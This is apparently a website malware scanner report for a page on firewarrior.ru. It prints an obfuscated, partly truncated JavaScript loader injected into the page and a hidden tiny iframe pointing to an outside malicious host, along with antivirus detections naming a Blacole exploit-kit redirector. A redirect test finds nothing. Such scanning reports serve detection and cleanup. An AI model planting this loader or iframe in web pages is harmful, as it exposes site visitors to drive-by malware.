Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1 ... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s); Antivirus reports: AntiVir JS/Redirector.htr Avast JS:Agent-KE [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Iframe.AHH K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1B1 Emsisoft Trojan.JS.Iframe.AHH (B) Comodo TrojWare.JS.Kryptik.AY McAfee-GW-Edition JS/Exploit-Blacole.cp DrWeb JS.Click.233 Kaspersky Trojan-Downloader.JS.Agent.fzo Microsoft Exploit:JS/Blacole.A MicroWorld-eScan Trojan.JS.Iframe.AHH Fortinet JS/Crypt.AAFD!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.cp NANO-Antivirus Trojan.Script.Iframe.dumti F-Secure Trojan.JS.Iframe.AHH VIPRE Trojan.JS.Obfuscator.v (v) F-Prot JS/Crypted.OB.gen AVG JS/Agent.L Norman Agent.WM GData Trojan.JS.Iframe.AHH Commtouch JS/Crypted.OB.gen BitDefender Trojan.JS.Iframe.AHH Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right">
http://www.firewarrior.ru/arms/rescue.html	200 OK Content-Length: 12367 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1 ... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s); Antivirus reports: AntiVir JS/Redirector.htr Avast JS:Agent-KE [Trj] Ikarus Exploit.JS.Blacole nProtect Trojan.JS.Iframe.AHH K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1B1 Emsisoft Trojan.JS.Iframe.AHH (B) Comodo TrojWare.JS.Kryptik.AY McAfee-GW-Edition JS/Exploit-Blacole.cp DrWeb JS.Click.233 Kaspersky Trojan-Downloader.JS.Agent.fzo Microsoft Exploit:JS/Blacole.A MicroWorld-eScan Trojan.JS.Iframe.AHH Fortinet JS/Crypt.AAFD!tr Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.cp NANO-Antivirus Trojan.Script.Iframe.dumti F-Secure Trojan.JS.Iframe.AHH VIPRE Trojan.JS.Obfuscator.v (v) F-Prot JS/Crypted.OB.gen AVG JS/Agent.L Norman Agent.WM GData Trojan.JS.Iframe.AHH Commtouch JS/Crypted.OB.gen BitDefender Trojan.JS.Iframe.AHH Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right">

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: firewarrior.ru

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: firewarrior.ru
Referer: http://www.google.com/search?q=firewarrior.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for firewarrior.ru

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools